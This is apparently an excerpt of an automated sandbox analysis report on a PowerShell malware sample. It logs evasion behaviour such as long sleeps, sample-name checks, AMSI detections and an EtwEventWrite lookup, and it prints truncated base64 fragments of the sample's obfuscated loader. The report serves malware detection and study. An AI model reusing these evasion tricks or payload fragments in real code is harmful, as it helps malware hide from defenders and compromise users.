                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                          Malware Analysis System Evasion

                          barindex
                          Source: 10.2.powershell.exe.8ba0000.1.raw.unpack, jlmrt.cs.Net Code: Main contains sample name check
                          Source: 23.2.powershell.exe.6a65940.0.raw.unpack, jlmrt.cs.Net Code: Main contains sample name check
                          Source: 39.2.powershell.exe.6101378.0.raw.unpack, jlmrt.cs.Net Code: Main contains sample name check
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6861Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2831Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: foregroundWindowGot 1758Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4241Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3378Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3188
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3919
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4181
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3868
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4966
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2846
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4866
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4096
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3749
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2736
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3286
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3379
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3408
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3749
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3251
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3496
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3106
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6524Thread sleep count: 6861 > 30Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6804Thread sleep count: 2831 > 30Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5268Thread sleep time: -14757395258967632s >= -30000sJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2700Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2700Thread sleep time: -922337203685477s >= -30000sJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7448Thread sleep count: 4241 > 30Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7436Thread sleep count: 3378 > 30Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7484Thread sleep time: -11068046444225724s >= -30000sJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7512Thread sleep time: -922337203685477s >= -30000sJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7444Thread sleep time: -922337203685477s >= -30000sJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8024Thread sleep count: 3188 > 30
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8052Thread sleep time: -11068046444225724s >= -30000s
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8020Thread sleep count: 3919 > 30
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8072Thread sleep time: -2767011611056431s >= -30000s
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8012Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2300Thread sleep count: 4181 > 30
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2364Thread sleep count: 3868 > 30
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7260Thread sleep time: -11068046444225724s >= -30000s
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5292Thread sleep time: -1844674407370954s >= -30000s
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2284Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1436Thread sleep count: 4966 > 30
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1436Thread sleep count: 2846 > 30
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7516Thread sleep time: -11990383647911201s >= -30000s
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7764Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5256Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7776Thread sleep count: 4866 > 30
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7912Thread sleep time: -8301034833169293s >= -30000s
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7908Thread sleep time: -1844674407370954s >= -30000s
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7776Thread sleep count: 280 > 30
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7776Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8188Thread sleep count: 4096 > 30
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5412Thread sleep time: -3689348814741908s >= -30000s
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5320Thread sleep time: -2767011611056431s >= -30000s
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8188Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5000Thread sleep count: 3749 > 30
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1412Thread sleep time: -5534023222112862s >= -30000s
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7660Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5000Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3228Thread sleep count: 2736 > 30
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2920Thread sleep time: -2767011611056431s >= -30000s
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6180Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3228Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6276Thread sleep count: 3286 > 30
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1656Thread sleep time: -6456360425798339s >= -30000s
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5340Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5648Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7540Thread sleep count: 3379 > 30
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4744Thread sleep time: -4611686018427385s >= -30000s
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1772Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6820Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3288Thread sleep count: 3408 > 30
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1272Thread sleep time: -9223372036854770s >= -30000s
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1580Thread sleep time: -1844674407370954s >= -30000s
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1224Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1436Thread sleep count: 3749 > 30
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7704Thread sleep time: -9223372036854770s >= -30000s
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7764Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7700Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4160Thread sleep count: 3251 > 30
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8020Thread sleep time: -4611686018427385s >= -30000s
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7988Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6308Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7940Thread sleep count: 3496 > 30
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4768Thread sleep time: -7378697629483816s >= -30000s
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4408Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5516Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6536Thread sleep count: 3106 > 30
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5536Thread sleep time: -3689348814741908s >= -30000s
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 360Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6664Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,18_2_00407898
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Jump to behavior
                          Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
                          Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
                          Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
                          Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\Jump to behavior
                          Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Jump to behavior
                          Source: powershell.exe, 0000000A.00000002.2252250805.0000000007437000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllbG
                          Source: powershell.exe, 00000022.00000002.2728918434.00000000072D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllcH
                          Source: powershell.exe, 00000027.00000002.2909452407.0000000007B50000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000003B.00000002.3788098301.000000000769E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll\
                          Source: powershell.exe, 00000040.00000002.3560278952.00000000027FC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll-
                          Source: powershell.exe, 00000036.00000002.3481570744.00000000078CC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlllFWCAnJGpocnVuPU5ldy1PYmplY3QgU3lzdGVtLklPLk1BQkNlbUFCQ29yQUJDeVNBQkN0ckFCQ2VhQUJDbSgsJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGpidXJpPU5ldy1PYmplY3QgU3lzdGVtLklPLkFCQ01BQkNlQUJDbUFCQ29BQkNyQUJDeUFCQ1NBQkN0QUJDckFCQ2j
                          Source: powershell.exe, 00000045.00000002.4547958232.0000000006E74000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllp3ZiA9ICdDOlxVc2Vyc1wnICsgJGtrYyArICdBQkNcQUJDZEFCQ3dBQkNtQUJDLkFCQ2JBQkNhQUJDdEFCQycuUmVwbGFjZSgnQUJDJywgJycpOyRob3N0LlVJLlJhd1VJLldpbmRvd1RpdGxlID0gJHduandmOyR1bXFvaj1bU3lzdGVtLklPLkZpbGVdOjooJ3R4ZVRsbEFkYWVSJ1stMS4uLTExXSAtam
                          Source: powershell.exe, 00000017.00000002.2410234878.0000000007903000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2563584083.00000000076E0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000031.00000002.3335280193.00000000076D3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                          Source: powershell.exe, 0000002C.00000002.3104377848.0000000007712000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllLiV
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_00404C9D LoadLibraryA,GetProcAddress,18_2_00404C9D
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

                          HIPS / PFW / Operating System Protection Evasion

                          barindex
                          Source: Yara matchFile source: amsi32_1200.amsi.csv, type: OTHER
                          Source: Yara matchFile source: amsi32_7400.amsi.csv, type: OTHER
                          Source: Yara matchFile source: amsi32_7976.amsi.csv, type: OTHER
                          Source: Yara matchFile source: amsi32_1784.amsi.csv, type: OTHER
                          Source: Yara matchFile source: amsi32_1476.amsi.csv, type: OTHER
                          Source: Yara matchFile source: amsi32_1720.amsi.csv, type: OTHER
                          Source: Yara matchFile source: amsi32_7980.amsi.csv, type: OTHER
                          Source: Yara matchFile source: amsi32_5440.amsi.csv, type: OTHER
                          Source: Yara matchFile source: amsi32_6304.amsi.csv, type: OTHER
                          Source: Yara matchFile source: amsi32_3628.amsi.csv, type: OTHER
                          Source: Yara matchFile source: amsi32_7240.amsi.csv, type: OTHER
                          Source: Yara matchFile source: amsi32_6492.amsi.csv, type: OTHER
                          Source: Yara matchFile source: amsi32_5996.amsi.csv, type: OTHER
                          Source: Yara matchFile source: amsi32_3496.amsi.csv, type: OTHER
                          Source: Yara matchFile source: amsi32_2640.amsi.csv, type: OTHER
                          Source: Yara matchFile source: amsi32_5408.amsi.csv, type: OTHER
                          Source: 10.2.powershell.exe.8ba0000.1.raw.unpack, jlmrt.csReference to suspicious API methods: LoadLibrary("ntdll.dll")
                          Source: 10.2.powershell.exe.8ba0000.1.raw.unpack, jlmrt.csReference to suspicious API methods: GetProcAddress(hModule, "EtwEventWrite")
